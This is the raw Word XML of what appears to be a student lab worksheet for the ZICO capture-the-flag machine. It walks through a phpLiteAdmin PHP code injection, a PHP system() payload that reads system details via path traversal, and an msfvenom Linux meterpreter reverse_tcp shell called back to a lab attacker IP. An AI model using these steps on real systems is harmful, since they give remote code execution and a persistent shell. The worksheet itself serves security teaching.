          <w:p w14:paraId="2ED242F2" w14:textId="33B52FD3" w:rsidR="001D4DB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ad the document /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usr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/share/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exploitdb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/exploits/php/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webapps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/24044.txt and explain</w:t>
            </w:r>
            <w:r w:rsidR="001D4DB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what </w:t>
            </w:r>
            <w:r w:rsidR="00960C98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the vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="001D4DB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“1.9.3 – Remote PHP Code Injection” </w:t>
            </w:r>
            <w:r w:rsidR="00960C9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is </w:t>
            </w:r>
            <w:r w:rsidR="001D4DB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about:</w:t>
            </w:r>
            <w:r w:rsidR="00960C9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</w:t>
            </w:r>
            <w:r w:rsidR="00960C98">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
              <w:t xml:space="preserve">(Write at least </w:t>
            </w:r>
            <w:r w:rsidR="00960C98">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00960C98">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
              <w:t xml:space="preserve"> lines):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9230BB" w14:textId="46DC6A26" w:rsidR="001D4DBD" w:rsidRDefault="001D4DB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0E1099A" w14:textId="77777777" w:rsidR="009879E3" w:rsidRPr="00853EC8" w:rsidRDefault="009879E3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1DBBE54" w14:textId="77777777" w:rsidR="001D4DBD" w:rsidRDefault="001D4DB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477E9DE9" w14:textId="243A0B99" w:rsidR="009879E3" w:rsidRPr="00853EC8" w:rsidRDefault="009879E3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917D60E" w14:textId="77777777" w:rsidR="001D4DBD" w:rsidRDefault="001D4DB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018F65D" w14:textId="77777777" w:rsidR="00C055FD" w:rsidRDefault="00C055FD" w:rsidP="00C055F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To exploit the vulnerability, c</w:t>
      </w:r>
      <w:r w:rsidR="00FC4493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">reate a database called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>hack.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> and create a table with the following SQL syntax:</w:t>
      </w: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 xml:space="preserve">CREATE TABLE </w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidRPr="007F3F10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="009879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1"/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 xml:space="preserve"> (</w:t>
      </w:r>
      <w:commentRangeStart w:id="2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'1'</w:t>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r w:rsidR="00960C98">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="2"/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commentRangeStart w:id="3"/>
      <w:r w:rsidRPr="007F3F10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">TEXT </w:t>
      </w:r>
      <w:commentRangeEnd w:id="3"/>
      <w:r w:rsidR="009879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="3"/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 xml:space="preserve">default </w:t>
      </w:r>
      <w:commentRangeStart w:id="4"/>
      <w:r w:rsidRPr="007F3F10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r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&lt;?php </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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; id; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/*-release; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 -a"); ?&gt;</w:t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>'</w:t>
      </w:r>
      <w:commentRangeEnd w:id="4"/>
      <w:r w:rsidR="009879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="4"/>
      </w:r>
      <w:r w:rsidRPr="007F3F10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D696BC4" w14:textId="3A79A4F3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0963DB5" w14:textId="238D1BEF" w:rsidR="00C055FD" w:rsidRDefault="00C055FD" w:rsidP="00C055F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 w:rsidRPr="007F3F10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w: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It is better to write the SQL query directly in the SQL tab because if you copy and paste it some characters (specifically quotes) will vary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9DE69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3DBD3D6" w14:textId="1DAC1EFC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F2D5D3F" w14:textId="3A5F20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E6D4254" w14:textId="70968D32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AB39A98" w14:textId="373E948F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6D5F588" w14:textId="09395C78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89D1705" w14:textId="3D891A32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FBEC1E9" w14:textId="6421E800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3CE3879" w14:textId="19591FB9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B22C4AB" w14:textId="4FDF7A09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B5981A9" w14:textId="43D01ACB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1A0B4E4" w14:textId="2D484BD2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9918B95" w14:textId="6FA4BA3A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81EB44E" w14:textId="0CF7F7C5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3B2E664F" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9A5421" w14:textId="1C18E453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Replace this </w:t>
            </w:r>
            <w:commentRangeStart w:id="5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screenshot </w:t>
            </w:r>
            <w:commentRangeEnd w:id="5"/>
            <w:r w:rsidR="009879E3">
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
              </w:rPr>
              <w:commentReference w:id="5"/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(Creation of the database) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AB6F98E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404E769" w14:textId="541AA801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6D9A50CD">
                <v:shape id="_x0000_i1040" type="#_x0000_t75" style="width:442.85pt;height:269pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId14" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79C84871" w14:textId="1390165B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31647F74" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F55E93" w14:textId="619680E3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Replace this </w:t>
            </w:r>
            <w:commentRangeStart w:id="6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screenshot </w:t>
            </w:r>
            <w:commentRangeEnd w:id="6"/>
            <w:r w:rsidR="009879E3">
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
              </w:rPr>
              <w:commentReference w:id="6"/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(Creation of the table) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59292C71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DDC8EF1" w14:textId="1AE10FCC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3E7EA086">
                <v:shape id="_x0000_i1041" type="#_x0000_t75" style="width:442.2pt;height:154.2pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId15" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05B13C2B" w14:textId="77777777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E112005" w14:textId="4B5AD38C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6726F42" w14:textId="1F23292B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2EF2992" w14:textId="4C1A7C70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F24A995" w14:textId="2C8A8B40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A0CF316" w14:textId="3DD66EDB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667958F" w14:textId="77777777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5F2ADF9" w14:textId="77777777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949623C" w14:textId="5F4A4EF1" w:rsidR="00FC4493" w:rsidRDefault="00FC449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D64050C" w14:textId="77777777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3B2EB8A" w14:textId="033A72DC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AA10924" w14:textId="316BA39B" w:rsidR="007F3F10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3DBA82C2" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E2D15C2" w14:textId="2E26DF5E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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Replace this </w:t>
            </w:r>
            <w:commentRangeStart w:id="7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screenshot </w:t>
            </w:r>
            <w:commentRangeEnd w:id="7"/>
            <w:r w:rsidR="009879E3">
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
              </w:rPr>
              <w:commentReference w:id="7"/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(Validate values of the table are correct) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21B4A0A3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7E314697" w14:textId="6E0B5DCD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436E0039">
                <v:shape id="_x0000_i1042" type="#_x0000_t75" style="width:442.2pt;height:152.85pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId16" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B94C8C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097051BF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D6FB47B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CDFCDE7" w14:textId="612E81FF" w:rsidR="00C055FD" w:rsidRDefault="007F3F1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Execute the following URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00C055FD" w:rsidRPr="00B96733">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>http://192.168.56.101/view.php?page=../../usr/databases/hack.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009879E3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/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r w:rsidR="009879E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">and observe that the value of the FIELD 1, namely the 4 injected operative system commands: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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; id; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/*-release; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009879E3" w:rsidRPr="00960C98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a"</w:t>
      </w:r>
      <w:r w:rsidR="009879E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>, were executed!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4DDF72" w14:textId="77777777" w:rsidR="009879E3" w:rsidRDefault="009879E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6A9249BF" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C181FA" w14:textId="7660E910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Replace this </w:t>
            </w:r>
            <w:commentRangeStart w:id="8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screenshot </w:t>
            </w:r>
            <w:commentRangeEnd w:id="8"/>
            <w:r w:rsidR="009879E3">
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
              </w:rPr>
              <w:commentReference w:id="8"/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(Validate values of the table are correct) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED9FBF3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445058CC" w14:textId="057F0EA1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596B53EA">
                <v:shape id="_x0000_i1043" type="#_x0000_t75" style="width:442.2pt;height:99.15pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId18" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="593F404A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FDAB0E8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01F3425" w14:textId="77777777" w:rsidR="009879E3" w:rsidRDefault="009879E3" w:rsidP="009879E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8203EF0" w14:textId="77777777" w:rsidR="009879E3" w:rsidRDefault="009879E3" w:rsidP="009879E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9879E3" w14:paraId="0062BF83" w14:textId="77777777" w:rsidTr="009879E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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72AC" w14:textId="3D8830F5" w:rsidR="009879E3" w:rsidRDefault="009C523A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/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
            </w:pPr>
            <w:r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Please explain what this </w:t>
            </w:r>
            <w:commentRangeStart w:id="9"/>
            <w:r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obtained information</w:t>
            </w:r>
            <w:commentRangeEnd w:id="9"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
              </w:rPr>
              <w:commentReference w:id="9"/>
            </w:r>
            <w:r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can be used for</w:t>
            </w:r>
            <w:r w:rsidR="009879E3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</w:t>
            </w:r>
            <w:r w:rsidR="009879E3">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
              <w:t>(Write at least 5 lines):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000B297F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4743AE06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0A780190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8E0A936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DC8436D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26CF7907" w14:textId="77777777" w:rsidR="009879E3" w:rsidRDefault="009879E3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6759C061" w14:textId="77777777" w:rsidR="009879E3" w:rsidRDefault="009879E3" w:rsidP="009879E3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936477E" w14:textId="77777777" w:rsidR="009879E3" w:rsidRDefault="009879E3" w:rsidP="009879E3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B32D2A" w14:textId="1BEC8BED" w:rsidR="001A04B5" w:rsidRDefault="00C055FD" w:rsidP="00C055FD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc17521199"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>FLAG</w:t>
      </w:r>
      <w:r w:rsidR="001A04B5" w:rsidRPr="001A04B5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5:</w:t>
      </w:r>
      <w:r w:rsidR="001A04B5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implant a shell in the ZICO server virtual machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="199663AA" w14:textId="77777777" w:rsidR="00C055FD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 w:rsidRPr="001A04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a reverse shell able to communicate to the IP of the hacker machine through a specific port (443) using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C523A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C055FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001A04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">Try the following command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEC820C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039089F" w14:textId="397A250F" w:rsidR="001A04B5" w:rsidRPr="001A04B5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proofErr w:type="spellStart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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -a x86 –platform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A04B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.56.102 LPORT=443 -f elf -o shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133F1BF" w14:textId="1545D8C9" w:rsidR="001A04B5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7F0728A1" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557E4458" w14:textId="6B4766B0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(Generation of the payload) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B93621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732722B" w14:textId="22C2EDA0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1552C101">
                <v:shape id="_x0000_i1044" type="#_x0000_t75" style="width:441.5pt;height:74.05pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId19" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7D1122" w14:textId="2580B3CB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39A4301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  <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A0CBE8" w14:textId="38BB6A3C" w:rsidR="001A04B5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BF56B69" w14:textId="50AE9C2D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Validate properties of the payload using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="009C523A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA5592" w14:textId="02A1991C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705A404B" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E0177BD" w14:textId="39829C9C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(Review properties of the payload) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA214A7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C719888" w14:textId="77777777" w:rsidR="00C055FD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16FF313F">
                <v:shape id="_x0000_i1045" type="#_x0000_t75" style="width:441.5pt;height:44.15pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId20" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="37F29566" w14:textId="7EABB5FD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0C7B7D33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AD6D834" w14:textId="77777777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84E18B1" w14:textId="51618012" w:rsidR="001A04B5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Publish the shell in a webserver in the hacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B1213" w14:textId="20712D15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1CB8AC2C" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56955924" w14:textId="1E1736C2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(Start apache and publish the shell) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605EA85E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594525C5" w14:textId="77777777" w:rsidR="00C055FD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661953D6">
                <v:shape id="_x0000_i1046" type="#_x0000_t75" style="width:441.5pt;height:54.35pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A2C9E0F" w14:textId="2A6E01BB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0DB51BA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28D6CA3" w14:textId="068D4C36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5B1606C" w14:textId="580C2CA3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5CF988A" w14:textId="2EE16C29" w:rsidR="001A04B5" w:rsidRDefault="001A04B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8FF393D" w14:textId="3009FD38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A4412CE" w14:textId="70922AEC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2858184" w14:textId="46C68071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83A4093" w14:textId="7DCC12DA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8FC3207" w14:textId="1E1801B3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A05EAA0" w14:textId="7006B13F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BCAB5C6" w14:textId="3AAC3862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BFBDE11" w14:textId="0883238C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9F75E98" w14:textId="11F4B18E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34C613C" w14:textId="543B3408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E47ECD8" w14:textId="285627C9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C4113AD" w14:textId="379C9C87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E2DC83A" w14:textId="0D67231A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8BA619B" w14:textId="313F43E3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31C275E" w14:textId="4A1F1B10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65E0D74" w14:textId="0136F06A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3B1BABF" w14:textId="77777777" w:rsidR="00CE5DEE" w:rsidRDefault="00CE5DEE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1904780" w14:textId="2500143F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Test that the shell is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>actually published</w:t>
      </w:r>
      <w:proofErr w:type="gram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accessing to the following URL:</w:t>
      </w:r>
      <w:r w:rsidR="00C055FD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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>htttp://192.168.56.102/shellDanielDiaz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1572EE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EB6813E" w14:textId="44E6D739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bookmarkStart w:id="11" w:name="_GoBack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54E4F4E6" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E9F75E" w14:textId="7DA4265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Replace this screenshot (Validate that the shell is </w:t>
            </w:r>
            <w:proofErr w:type="gram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actually published</w:t>
            </w:r>
            <w:proofErr w:type="gram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) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5472F0C3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53917F7" w14:textId="7D7E89A9" w:rsidR="00C055FD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00D4C462">
                <v:shape id="_x0000_i1047" type="#_x0000_t75" style="width:442.2pt;height:216.7pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId22" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B4C512D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71153025" w14:textId="6A5934D2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66DB797A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830D414" w14:textId="585A5857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Prepare a process </w:t>
      </w:r>
      <w:r w:rsidR="00C772A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C772A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C772A1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to receive the </w:t>
      </w:r>
      <w:commentRangeStart w:id="12"/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reverse_tc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connection</w:t>
      </w:r>
      <w:commentRangeEnd w:id="12"/>
      <w:r w:rsidR="00C772A1">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="12"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC39823" w14:textId="4DB045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73F4A68E" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B68C76" w14:textId="3984772E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Replace this screenshot (Set a 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verse_tcp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) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DD0085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6ADA0D4" w14:textId="28DCCBD5" w:rsidR="00E83DA7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5882B168">
                <v:shape id="_x0000_i1048" type="#_x0000_t75" style="width:442.2pt;height:108.7pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId23" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
